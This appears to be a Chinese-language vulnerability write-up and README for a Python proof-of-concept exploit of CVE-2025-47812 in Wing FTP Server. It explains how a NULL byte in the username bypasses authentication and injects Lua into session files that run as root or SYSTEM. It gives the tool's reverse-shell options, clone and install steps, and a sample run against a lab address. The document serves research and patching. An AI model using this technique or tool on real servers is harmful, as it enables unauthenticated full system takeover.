CVE-2025-47812 不正确的输入验证导致远程代码执行直至完全系统沦陷
来自 RCE Security 的 Julien Ahrens 发现了一个影响 WingFTP 的关键安全漏洞。该漏洞被跟踪为 CVE-2025-47812,CVSS 评分为 10。成功利用该漏洞可能允许远程未认证攻击者执行任意代码,从而导致完全的系统沦陷。
Wing FTP Server 是一款跨平台、用户友好且安全的 FTP 服务器软件。它支持多种文件传输协议,如 FTP、FTPS、HTTP、HTTPS 和 SFTP,为客户端的连接提供了灵活性。
为了研究 CVE-2025-47812,我在一台 Linux 主机上部署了一个运行 Wing FTP Server 7.4.3 的 Docker 容器。该容器被配置为暴露 Web 界面,并启用了匿名登录以方便进行未认证测试。此外,还创建了一个测试用户帐户(dev-test:test)来模拟认证场景。此设置提供了一个安全且受控的环境,用于复现漏洞并验证利用行为。
CVE ID: CVE-2025-47812
CVSS v3.1 向量:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
基础评分:10.0(严重)
受影响软件:<= 7.4.3
影响:远程代码执行导致完全的系统沦陷。
利用前提条件:
允许匿名登录或具备有效用户凭据
用户不需要 sudo 权限
当用户尝试登录时,系统会调用 c_CheckUser 调用,该调用总是返回 OK_CHECK_CONNECTION,无论用户名中 NULL 字节之后是什么,只要 NULL 字节之前的字符串与现有用户匹配即可。攻击者可以通过向已知用户名添加 NULL 字节和额外值来绕过密码检查。系统使用 strlen() 对用户名计算字符串长度,但 strlen 只会计算到 NULL 字节终止符为止的所有字符,从而与未经净化的用户名匹配。
未经净化的用户名(包括注入的 NULL 和精心构造的 payload)会作为 Lua 代码直接存储到会话文件中。这些会话文件类似 .lua 文件,并会在会话加载时被执行。在 Linux 上,Wing FTP 服务器以 root 权限运行;在 Windows 上,以 SYSTEM 权限运行。注入的 Lua payload 在会话重新加载时会以完全权限执行。
注意:只有在未设置密码或使用有效凭据时才会发生此行为。如果为用户设置了密码,则会强制进行某些严格的密码验证。
Options:
-t, --target Target Wing FTP Server URL (e.g., http://192.168.1.100)
-u, --username Username to authenticate (default: anonymous)
-p, --password Password to authenticate (default: empty)
-lh, --lhost Local host to listen for reverse shell (default: 127.0.0.1)
-lp, --lport Local port to listen for reverse shell (default: 31337)
-ns, --no-shell To specify the exploit to not span a temp shell. (Note if it set should manually set listener)
-v, --verbose Enable verbose/debug output
-h, --help Show this help message and exit
git clone https://github.com/pevinkumar10/CVE-2025-47812
cd CVE-2025-47812
pip3 install -r requirements.txt
CVE-2025-47812 - Wing FTP Server 未认证 RCE
CVE-2025-47812 - Wing FTP Server 已认证 RCE(dev-test:test)
示例用法:
python3 exploit.py --target http://172.17.0.2 --lhost 172.17.0.1 -lport 31336
用户必须将 WingFTP 升级到 7.4.4 版本以修复该漏洞。
请参阅 WingFTP 发布说明了解更多信息。
注意:我使用了上述参考资料用于研究目的,并为漏洞利用脚本增加了更多功能和更健壮的错误处理。
此 Python PoC 根据 MIT 许可证发布。
原始漏洞利用概念和披露功劳归 Stratascale Cyber Research Unit 所有。